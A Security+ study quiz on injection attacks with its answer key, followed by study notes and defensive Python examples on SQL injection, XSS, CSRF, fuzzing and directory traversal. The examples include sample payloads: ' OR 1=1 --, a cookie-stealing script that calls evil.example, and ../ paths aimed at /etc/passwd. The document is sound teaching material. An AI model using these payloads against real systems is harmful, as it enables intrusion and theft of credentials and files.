CompTIA Security+: Injection Attacks Quiz

Questions and Answers

Structured Exception Handling provides control over what the application should do when faced with a syntax error.

False (B)

Input validation ensures that information received from a user only matches a specific format.

True (A)

Static Analysis involves analyzing and testing a program while it is being executed or run.

False (B)

Dynamic Analysis occurs while a program is being executed or run.

True (A)

Fuzzing is a method to inject randomized data into a software program in an attempt to find system failures.

True (A)

Backdoors are considered a good coding practice and should be utilized in computer programs.

False (B)

Directory Traversal involves accessing authorized directories by moving through the directory structure on a remote server.

False (B)

Arbitrary Code Execution happens when an attacker can execute commands on their own computer.

False (B)

XSRF prevention focuses on preventing Cross-Site Scripting (XSS) attacks.

False (B)

SQL Injection is a technique used to insert malicious SQL queries into input data.

True (A)


Study Notes

Injection Attacks

  • SQL Injection: an attack consisting of the insertion or injection of an SQL query via input data from the client to a web application, so that attacker-supplied text is executed as part of the application's own query.
  • SQL Injection is prevented primarily with parameterized (prepared) queries, which bind input as data instead of concatenating it into the SQL text; input validation and running the application's database account with least privilege limit what a successful injection can reach.
  • OR 1=1 is a common indicator of an SQL injection attempt, because it turns a WHERE clause into a condition that is always true.
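The following is an added example, not code from the original lesson: a login check built by string concatenation beside the parameterized version, both run against an in-memory SQLite table with constructed sample rows. The table layout and the `demo` helper are assumptions for illustration.

```python
# Added example (not from the original lesson): SQL injection through string
# concatenation beside the parameterized query that prevents it.
# Uses an in-memory SQLite database with constructed sample rows.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hunter2"), ("bob", "s3cret")],  # constructed sample data
    )
    return conn


def login_vulnerable(conn, username, password):
    # Attacker-controlled strings are pasted into the SQL text, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return sorted(row[0] for row in conn.execute(query))


def login_safe(conn, username, password):
    # Placeholders bind the input as data; the database never parses it as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


def demo(payload="' OR 1=1 --"):
    # The classic payload: closes the string literal, adds an always-true
    # clause and comments out the password check.
    conn = make_db()
    return {
        "injected_query_returns": login_vulnerable(conn, payload, "wrong"),
        "parameterized_returns": login_safe(conn, payload, "wrong"),
        "legitimate_login": login_safe(conn, "alice", "hunter2"),
    }


if __name__ == "__main__":
    print(demo())
```

With the payload, the concatenated query becomes `... WHERE username = '' OR 1=1 --' AND password = 'wrong'` and returns every user; the parameterized query looks for a user literally named `' OR 1=1 --` and returns nothing.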

Buffer Overflows

  • A buffer overflow occurs when a program writes more data into a fixed-size buffer than it can hold, so the excess overwrites adjacent memory such as a function's saved return address.
  • To exploit one, an attacker commonly fills the buffer with NOP (no operation) instructions followed by their own code; the overwritten return address only has to land somewhere in that NOP sled for execution to slide down into the attacker's code.
  • Stack refers to a reserved area of memory where the program saves the return address (along with local variables) when a function call instruction is received.

Address Space Layout Randomization (ASLR)

  • ASLR is an operating-system mitigation that randomly arranges the base addresses of the memory regions (stack, heap, libraries, executable) used by a program or process, so an attacker cannot reliably predict where their code or a return target sits. It makes buffer overflow exploits unreliable rather than preventing the overflow itself, and it is weakened if an information leak discloses an address.

Cross-Site Scripting (XSS)

  • XSS occurs when an attacker embeds malicious scripting commands in a trusted website so that they run in the browsers of other users of that site.
  • Types of XSS include:
    • Stored/Persistent: attacker-provided data (a comment, profile field, etc.) is saved on the web server and served to every victim who later views the page.
    • Reflected: the payload is carried in a request (typically a link the victim clicks) and echoed back in the response without being stored, so the effect is non-persistent.
    • DOM-based: client-side JavaScript in the page writes attacker-controlled data (for example from the URL fragment) into the DOM, so the payload executes in the victim's browser without the server ever reflecting it.
  • XSS can be prevented with output encoding appropriate to the context (HTML body, attribute, JavaScript, URL) and proper input validation.
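The following is an added example, not code from the original lesson: the same untrusted comment rendered without and with HTML output encoding, plus an allowlist check of the kind "proper input validation" refers to. The payload, template and username rule are constructed for illustration.

```python
# Added example (not from the original lesson): one untrusted comment rendered
# raw and then with HTML output encoding, plus an allowlist input check.
import html
import re

# Constructed attacker input, as it might be stored on the server (persistent
# XSS) or echoed back from a query string (reflected XSS).
PAYLOAD = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'

TEMPLATE = '<div class="comment">{}</div>'   # assumed page fragment


def render_vulnerable(comment):
    # Raw interpolation: the browser parses the comment as markup and runs it.
    return TEMPLATE.format(comment)


def render_encoded(comment):
    # html.escape rewrites & < > " ' as entities, so the browser displays the
    # payload as text. This is the encoding for HTML body/attribute context;
    # JavaScript or URL contexts need their own encoder.
    return TEMPLATE.format(html.escape(comment, quote=True))


def contains_script_tag(markup):
    # Crude check used only to show the difference between the two renderings.
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")


def valid_username(value):
    # Allowlist validation: accept only what a username is supposed to look
    # like instead of trying to strip out known-bad characters.
    return USERNAME_RE.fullmatch(value) is not None
```

Encoding is applied at output time, in the template, because the same stored value may be rendered in several places; validating usernames on input reduces what ever reaches storage, but it is not a substitute for encoding free-text fields.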

Cross-Site Request Forgery (XSRF/CSRF)

  • XSRF occurs when an attacker forces a user's browser to send requests to a web application where the user is already authenticated, so the server carries out actions (transfers, password changes, purchases) the user never intended.
  • XSRF can be prevented with anti-forgery tokens tied to the user's session, the SameSite cookie attribute, and verification of the request's origin (Origin/Referer headers) before acting on state-changing requests.
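The following is an added example, not code from the original lesson: a session-bound anti-forgery token and the checks a server would run before acting on a state-changing request. The secret key, allowed origin, session id and form/header layout are assumptions for illustration.

```python
# Added example (not from the original lesson): a session-bound anti-CSRF token
# plus an origin check, and three requests run through the acceptance logic.
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SECRET_KEY = secrets.token_bytes(32)      # assumed per-deployment server secret
ALLOWED_ORIGIN = "https://app.example"    # assumed site origin


def issue_token(session_id):
    # Token = HMAC(secret, session id): unforgeable without the key and useless
    # if replayed against another session. The server embeds it in its forms;
    # an attacker's page cannot read it because of the same-origin policy.
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers):
    # Browsers attach Origin (or at least Referer) to cross-site POSTs; a value
    # for another site means our own page did not initiate the request.
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    parts = urlsplit(origin)
    return f"{parts.scheme}://{parts.netloc}" == ALLOWED_ORIGIN


def accept_state_change(session_id, headers, form):
    """True only if the request carries this session's token and a matching origin."""
    if not origin_allowed(headers):
        return False
    presented = form.get("csrf_token", "")
    expected = issue_token(session_id)
    # Constant-time comparison avoids leaking the token byte by byte.
    return hmac.compare_digest(presented, expected)


def demo():
    sid = "sess-1234"                                  # constructed session id
    good_headers = {"Origin": "https://app.example"}
    evil_headers = {"Origin": "https://evil.example"}
    return {
        "legit": accept_state_change(sid, good_headers, {"csrf_token": issue_token(sid)}),
        "forged_no_token": accept_state_change(sid, evil_headers, {}),
        "good_origin_no_token": accept_state_change(sid, good_headers, {}),
        "other_session_token": accept_state_change(
            sid, good_headers, {"csrf_token": issue_token("sess-9999")}),
    }
```

The origin check and the token are independent layers: a forged request from another site fails the first, and a request that somehow reaches the handler from the right origin still has to present the token the attacker's page could never read.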

Input Validation

  • Input validation is a process where applications verify that information received from a user matches a specific format or range of values before it is used; allowlisting the expected format is stronger than blocklisting known-bad input.
  • Techniques for finding input validation flaws (and other software bugs) include:
    • Static Analysis: reviewing the source code of an application manually or with automatic tools without running the code.
    • Dynamic Analysis: analysis and testing of a program that occurs while it is being executed or run.
    • Fuzzing: injecting randomized or malformed data into a running program to find crashes, memory leaks, error handling issues, and improper input validation.
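The following is an added example, not code from the original lesson: a seeded fuzzer run against a toy binary record parser that trusts its own length field, and then against the same parser with bounds checks added. The record format (type byte, 2-byte length, payload, 4-byte checksum) and the fuzzing parameters are assumptions for illustration.

```python
# Added example (not from the original lesson): fuzzing a toy TLV parser that
# trusts its length field, then the bounds-checked version of the same parser.
import random
import struct


def parse_record(data):
    """Toy record: 1-byte type, 2-byte big-endian length, payload, 4-byte checksum.
    Bug: the declared length is trusted, so short or truncated input makes
    struct.unpack (or the indexing) raise instead of a controlled rejection."""
    rtype = data[0]
    (length,) = struct.unpack(">H", data[1:3])
    payload = data[3:3 + length]
    (checksum,) = struct.unpack(">I", data[3 + length:7 + length])
    return rtype, payload, checksum


def parse_record_checked(data):
    """Same format with input validation: every read is bounds-checked first."""
    if len(data) < 7:
        raise ValueError("record shorter than fixed header and trailer")
    rtype = data[0]
    (length,) = struct.unpack(">H", data[1:3])
    if len(data) != 7 + length:
        raise ValueError("declared length does not match buffer size")
    payload = data[3:3 + length]
    (checksum,) = struct.unpack(">I", data[3 + length:7 + length])
    return rtype, payload, checksum


def fuzz(target, seed=1, iterations=500, max_len=16):
    """Feed seeded random bytes to target and return the crashes: any exception
    other than the parser's own ValueError, each as (input, exception name)."""
    rng = random.Random(seed)           # seeded so a finding can be reproduced
    crashes = []
    for _ in range(iterations):
        sample = bytes(rng.randrange(256) for _ in range(rng.randint(0, max_len)))
        try:
            target(sample)
        except ValueError:
            pass                        # controlled rejection: the desired outcome
        except Exception as exc:        # IndexError, struct.error: a real bug
            crashes.append((sample, type(exc).__name__))
    return crashes


def build_record(rtype, payload, checksum):
    """Constructed well-formed record, used to confirm the parser still works."""
    return (bytes([rtype]) + struct.pack(">H", len(payload))
            + payload + struct.pack(">I", checksum))


if __name__ == "__main__":
    print("unchecked parser crashes:", len(fuzz(parse_record)))
    print("checked parser crashes:  ", len(fuzz(parse_record_checked)))
```

In a native parser the same missing length check would read or write past the buffer rather than raise a Python exception, which is why fuzzers are usually run under sanitizers that turn silent memory errors into crashes.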

Software Vulnerabilities and Exploits

  • Backdoors: code placed in computer programs to bypass normal authentication and other security mechanisms.
  • Directory Traversal: a method of accessing unauthorized directories by moving through the directory structure on a remote server, typically by supplying path segments such as ../ (or their URL-encoded forms) in a file name parameter.
  • Arbitrary Code Execution: occurs when an attacker is able to execute or run commands on a victim computer.
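The following is an added example, not code from the original lesson: resolving a user-supplied file name under a web root, first the unsafe way and then with decoding, canonicalization and a containment check. The web root path is an assumption and does not need to exist.

```python
# Added example (not from the original lesson): a user-supplied file name
# resolved under a web root without and with a containment check.
import os
from urllib.parse import unquote

WEB_ROOT = "/srv/app/public"   # assumed document root


def resolve_vulnerable(base, requested):
    # join + normpath looks tidy but walks straight out of base with "../",
    # and os.path.join discards base entirely if requested is absolute.
    return os.path.normpath(os.path.join(base, requested))


def resolve_safe(base, requested):
    # Decode first so "..%2F" cannot slip past the check, canonicalize both
    # sides (realpath also follows symlinks), then require containment.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, unquote(requested)))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError("request escapes the web root: %r" % requested)
    return candidate


def is_allowed(base, requested):
    try:
        resolve_safe(base, requested)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    for name in ["docs/readme.txt", "../../../etc/passwd", "..%2F..%2Fetc/passwd", "/etc/passwd"]:
        print(name, "->", resolve_vulnerable(WEB_ROOT, name), "| allowed:", is_allowed(WEB_ROOT, name))
```

The containment test is done on the canonical path rather than by looking for ".." in the string, so encoded, doubled or symlinked variants are all judged by where they actually end up.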
